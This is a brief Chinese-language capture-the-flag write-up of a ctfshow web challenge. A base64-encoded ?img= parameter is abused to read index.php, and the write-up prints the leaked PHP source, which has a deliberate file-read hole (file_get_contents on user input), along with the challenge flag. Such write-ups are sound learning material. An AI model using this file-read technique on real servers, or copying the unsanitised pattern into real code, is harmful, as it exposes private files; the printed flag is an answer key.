打开界面是一个滑稽脸,注意到url后面?img=的内容
ZmFjZS5wbmc=
很像base64编码,解一下看看
可以看出是图片名
那要是?img=1呢
好诶,报错了,还带出了index.php
根据CTF-web定理中的“有啥就读啥”定理(瞎编的)
放到?img=后面看看
怎么还是报错?
哦对,要把index.php转成base64得aW5kZXgucGhw
没报错了
看看源代码
好哦,一大串base64编码
PD9waHAKLyoKIyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KIyBAQXV0aG9yOiBoMXhhCiMgQERhdGU6ICAgMjAyMy0wMy0yNyAxMDozMDozMAojIEBMYXN0IE1vZGlmaWVkIGJ5OiAgIGgxeGEKIyBATGFzdCBNb2RpZmllZCB0aW1lOiAyMDIzLTAzLTI4IDEyOjE1OjMzCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQojIEBsaW5rOiBodHRwczovL2N0ZmVyLmNvbQoKKi8KCiRpbWFnZT0kX0dFVFsnaW1nJ107CgokZmxhZyA9ICJjdGZzaG93ezIzMDUyNGRlLWRkOWUtNDMxZS1hNTA3LWZhMWM5OTYzNzQ5M30iOwppZihpc3NldCgkaW1hZ2UpKXsKCSRpbWFnZSA9IGJhc2U2NF9kZWNvZGUoJGltYWdlKTsKCSRkYXRhID0gYmFzZTY0X2VuY29kZShmaWxlX2dldF9jb250ZW50cygkaW1hZ2UpKTsKCWVjaG8gIjxpbWcgc3JjPSdkYXRhOmltYWdlL3BuZztiYXNlNjQsJGRhdGEnLz4iOwp9ZWxzZXsKCSRpbWFnZSA9IGJhc2U2NF9lbmNvZGUoImZhY2UucG5nIik7CgloZWFkZXIoImxvY2F0aW9uOi8/aW1nPSIuJGltYWdlKTsKfQoKCgoK
看看是啥
解出来是源代码,flag也有了
ctfshow{230524de-dd9e-431e-a507-fa1c99637493}